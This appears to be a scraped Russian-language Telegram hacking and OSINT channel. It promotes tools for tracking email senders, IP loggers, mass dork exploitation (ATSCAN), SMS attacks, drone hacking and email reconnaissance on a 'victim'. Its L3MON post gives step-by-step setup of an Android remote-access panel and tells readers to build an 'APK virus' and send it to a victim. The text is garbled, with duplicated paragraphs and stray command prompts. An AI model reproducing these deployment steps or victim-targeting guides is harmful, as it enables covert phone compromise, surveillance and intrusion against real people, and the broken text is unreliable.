#OSINT #Email Всем удачной тяпницы. Сегодня поговорим с вами об отслеживании электронных почтовых отправлений. Т.е. о возможности примерно сказать где находится отправитель или получатель электронного письма:
├emailheaders (Header Check)
├traceemail (Header Check)
├emailheader (Header Check)
├suip (Header Check)
├domaintools (WHOIS)
├getnotify (Mail Tracking)
├readnotify (Mail Tracking)
├didtheyreadit (Mail Tracking)
├mailtracking (Mail Tracking)
├canarytokens (Logger IP)
├grabify (Logger IP)
├iplogger (Logger IP)
├yandex (ADINT)
├google (ADINT)
└mytarget (ADINT)
├emailheaders (Header Check)
├traceemail (Header Check)
├emailheader (Header Check)
├suip (Header Check)
├domaintools (WHOIS)
├getnotify (Mail Tracking)
├readnotify (Mail Tracking)
├didtheyreadit (Mail Tracking)
├mailtracking (Mail Tracking)
├canarytokens (Logger IP)
├grabify (Logger IP)
├iplogger (Logger IP)
├yandex (ADINT)
├google (ADINT)
└mytarget (ADINT)
👍1
All-in-one OSINT tool for social media, domain, phone number, and other collection options#OSINT
https://github.com/Lucksi/Mr.Holmes
GitHub
GitHub - Lucksi/Mr.Holmes: A Complete Osint Tool :mag:
A Complete Osint Tool :mag:. Contribute to Lucksi/Mr.Holmes development by creating an account on GitHub.
MySMS v1.0 — cкрипт, который генерирует приложение для Android с функционалом SMS-атак через WAN.
Для пользователей Kali Linux.
#софт #хакинг
Для пользователей Kali Linux.
#софт #хакинг
Как совместно смотреть YouTube на расстоянии
Синхронный просмотр видео с различных площадок может понадобиться не только для развлечений, но и для организации совместной работы или обучения на расстоянии, что значительно повысит удобство взаимодействия.
Благодаря таким сервисам, как Watch2Gether вы сможете создавать приватные «комнаты» для совместного просмотра видео в режиме реального времени и параллельно общаться с помощью голосового чата или веб-камеры. Сайт не требует регистрации и поддерживает воспроизведение видеороликов не только с YouTube, но и Twitch, Deezer, Vimeo и других площадок.
Все что для этого требуется, нажать «
Синхронный просмотр видео с различных площадок может понадобиться не только для развлечений, но и для организации совместной работы или обучения на расстоянии, что значительно повысит удобство взаимодействия.
Благодаря таким сервисам, как Watch2Gether вы сможете создавать приватные «комнаты» для совместного просмотра видео в режиме реального времени и параллельно общаться с помощью голосового чата или веб-камеры. Сайт не требует регистрации и поддерживает воспроизведение видеороликов не только с YouTube, но и Twitch, Deezer, Vimeo и других площадок.
Все что для этого требуется, нажать «
Создать свою комнату», после ввести имя и кликнуть «Присоединитесь к комнате». Далее поделиться ссылкой с друзьями, чтобы они смогли присоединиться к просмотру и выбрать нужно видео для воспроизведения.
👍1
Мультитул для пентестинга
Atscan — новый инструмент по продвинутому поиску, массовой эксплуатации дорков и автоматическому обнаружению сайтов с уязвимостями.
Установка
Atscan — новый инструмент по продвинутому поиску, массовой эксплуатации дорков и автоматическому обнаружению сайтов с уязвимостями.
Установка
$ git clone https://github.com/AlisamTechnology/ATSCAN.gitИспoльзование
$ cd ATSCAN/
$ chmod +x ./install.sh
$ sudo ./install.sh
perl atscan.pl --help
Хакинг в хату ✌️
Расширение для засорения логов провайдера
В целом действия пользователя в сети отследить очень сложно. Давайте усложним в разы работу тому, кто захочет отследить какие либо действия с вашей стороны использовав расширение Chaff.
Chaff будет автоматически посещать случайные сайты. Это существенно затруднит отслеживание ваших действий и засорит историю. Так же внутри есть настройка частоты заходов на сайты и так далее.
Безопасности пост ✌️
В целом действия пользователя в сети отследить очень сложно. Давайте усложним в разы работу тому, кто захочет отследить какие либо действия с вашей стороны использовав расширение Chaff.
Chaff будет автоматически посещать случайные сайты. Это существенно затруднит отслеживание ваших действий и засорит историю. Так же внутри есть настройка частоты заходов на сайты и так далее.
Безопасности пост ✌️
👍1
Взламываем дрон
DroneSploit — это среда командной строки, основанная на
Необходимости
1) Linux система;
2) Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим);
Установка
$
$
DroneSploit — это среда командной строки, основанная на
sploitkitи попытка собрать методы взлома и эксплойты, особенно ориентированные на взлом дронов. Для простоты использования интерфейс имеет макет, похожий на Metasploit. В настоящее время он поддерживает только очень небольшое количество моделей дронов, но мы надеемся, что в ближайшем будущем мы будем приветствовать новые предложения.Необходимости
1) Linux система;
2) Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим);
Установка
$
sudo pip install dronesploit
Использование$
dronesploit
Строго в ознакомительных целях ✌️
👍1
Ищем уязвимости в современных автомобилях
4CAN V2 — проект Raspberry Pi, созданный командой Cisco для проверки безопасности автомобилей через шину 4CAN, он также может отправлять случайные полезные нагрузки для автоматизации этого процесса.
Установка
$
Использование
1. Подключаем Raspberry Pi;
2. Запускаем
4CAN V2 — проект Raspberry Pi, созданный командой Cisco для проверки безопасности автомобилей через шину 4CAN, он также может отправлять случайные полезные нагрузки для автоматизации этого процесса.
Установка
$
git clone https://github.com/alexdetrano/4CAN
$ cd 4CAN
$ ./install.sh
Скопируйте 4 файла mcp2515-canx.dtbo в каталог /boot/overlaysИспользование
1. Подключаем Raspberry Pi;
2. Запускаем
./4CAN.sh
Несмотря на то, что он автоматизирован, он все ещё требует некоторого опыта для использования ✌️
👍1
Безопасный мессенджер для настоящих параноиков
Tinfoil Chat — FOSS+FHD мессенджер, который использует аппаратную архитектуру высокой надежности для защиты пользователей от пассивного сбора данных, атак MITM и, что наиболее важно, удаленной фильтрации ключей. Открытый исходный код.
Все сообщения идут через Tor, в частности Tor сервисы нового поколения (V3). Разумеется, никакой регистрации не требуется ✌️
Tinfoil Chat — FOSS+FHD мессенджер, который использует аппаратную архитектуру высокой надежности для защиты пользователей от пассивного сбора данных, атак MITM и, что наиболее важно, удаленной фильтрации ключей. Открытый исходный код.
Все сообщения идут через Tor, в частности Tor сервисы нового поколения (V3). Разумеется, никакой регистрации не требуется ✌️
👍1
Взлом Android с помощью FUD полезной нагрузки
В этом посте мы поделимся облачным пакетом удалённого управления Android под названием «L3MON» . L3MON - это облачный пакет для удалённого управления Android.
Установка
$
$
$
Строго в ознакомительных целях ✌️
В этом посте мы поделимся облачным пакетом удалённого управления Android под названием «L3MON» . L3MON - это облачный пакет для удалённого управления Android.
Установка
$
apt install nodejs npm
$ npm install pm2 -g
$ git clone https://github.com/D3VL/L3MON.git
Использование $
cd L3MON
$ cd server
$ npm install
$ npm audit fix
$ pm2 start index.js
$ pm2 startup
Теперь ам нужно изменить пароль на шифрование хэша MD5 и поместить его в файл конфигурации для защиты панели администратора. Вы можете изменить пароль в соответствии с приведенной ниже командой.$
echo -n "12345" | md5sum
$ nano maindb.json
Запустите localhost на браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа. Более подробнее можно посмотреть по ссылке.Строго в ознакомительных целях ✌️
👍1
Как найти скрытое название канала Telegram
В данном посте мы разберём метод просмотра скрытого названия канала в Telegram с помощью Telegram клиента Telegram X.
1, Загружаем Telegram X на Android;
2. Открываем клиент;
3. Открываем канал и переходим к первому сообщению на канале вручную или пользуемся ссылкой
4. Поздравляю, вы великолепны!
Данный алгоритм покажет имя, введенное при создании канала. Единственный клиент, способный отображать эту информацию — Telegram X ✌️
В данном посте мы разберём метод просмотра скрытого названия канала в Telegram с помощью Telegram клиента Telegram X.
1, Загружаем Telegram X на Android;
2. Открываем клиент;
3. Открываем канал и переходим к первому сообщению на канале вручную или пользуемся ссылкой
t.me/CHANNEL/1, где CHANNEL следует заменить на адрес канала;4. Поздравляю, вы великолепны!
Данный алгоритм покажет имя, введенное при создании канала. Единственный клиент, способный отображать эту информацию — Telegram X ✌️
👍1
Как узнать кто слил ваши документы или фото в сеть
Представьте ситуацию: вы отправляете кому-то или загружайте на какой либо сервис документ, содержащий личную информацию, а потом обнаруживаете, что он утек в сеть. Как найти источник утечки?
Как говорится, доверяй, но проверяй. LeaksID — сервис, позволяющий маркировать конфиденциальные документы невидимыми метками. В случае утечки (даже в виде скриншота или распечатки) сервис проведёт анализ и вычислит источник утечки. Можно юзать как просто онлайн конвертер документов, и на выходе получать защищенный PDF с невидимой маркировкой.
Дополнительные плюшки - хранилище документов внутри платформы и возможность совершать любые необходимые манипуляции: скачивать, просматривать, пускать на печать, делиться ссылкой на файл. Поддерживает все популярные форматы.
Бесплатно для частных юзеров и платно для компаний ✌️
Представьте ситуацию: вы отправляете кому-то или загружайте на какой либо сервис документ, содержащий личную информацию, а потом обнаруживаете, что он утек в сеть. Как найти источник утечки?
Как говорится, доверяй, но проверяй. LeaksID — сервис, позволяющий маркировать конфиденциальные документы невидимыми метками. В случае утечки (даже в виде скриншота или распечатки) сервис проведёт анализ и вычислит источник утечки. Можно юзать как просто онлайн конвертер документов, и на выходе получать защищенный PDF с невидимой маркировкой.
Дополнительные плюшки - хранилище документов внутри платформы и возможность совершать любые необходимые манипуляции: скачивать, просматривать, пускать на печать, делиться ссылкой на файл. Поддерживает все популярные форматы.
Бесплатно для частных юзеров и платно для компаний ✌️
👍1
Эти базы данных содержат информацию о более чем 785 000 оффшорных компаний, которые участвуют в расследованиях Paradise Papers, Panama Papers, Offshore Leaks и Bahamas Leaks. Данные связаны с людьми и компаниями из более чем 200 стран и территорий.
Пробиваем email жертвы
Infoga — инструмент, собирающий информацию об учетных записях электронной почты (ip, имя хоста, страна и т.д.) Из различных общедоступных источников (поисковые системы, серверы ключей pgp и shodan) и проверяющий, не произошла ли утечка писем с помощью API сервиса haveibeenpwned.
Установка
$
$
Infoga — инструмент, собирающий информацию об учетных записях электронной почты (ip, имя хоста, страна и т.д.) Из различных общедоступных источников (поисковые системы, серверы ключей pgp и shodan) и проверяющий, не произошла ли утечка писем с помощью API сервиса haveibeenpwned.
Установка
$
git clone https://github.com/m4ll0k/Infoga.git
$ cd Infoga
$ python setup.py install
Использование$
python infoga.py
OSINT в хату ✌️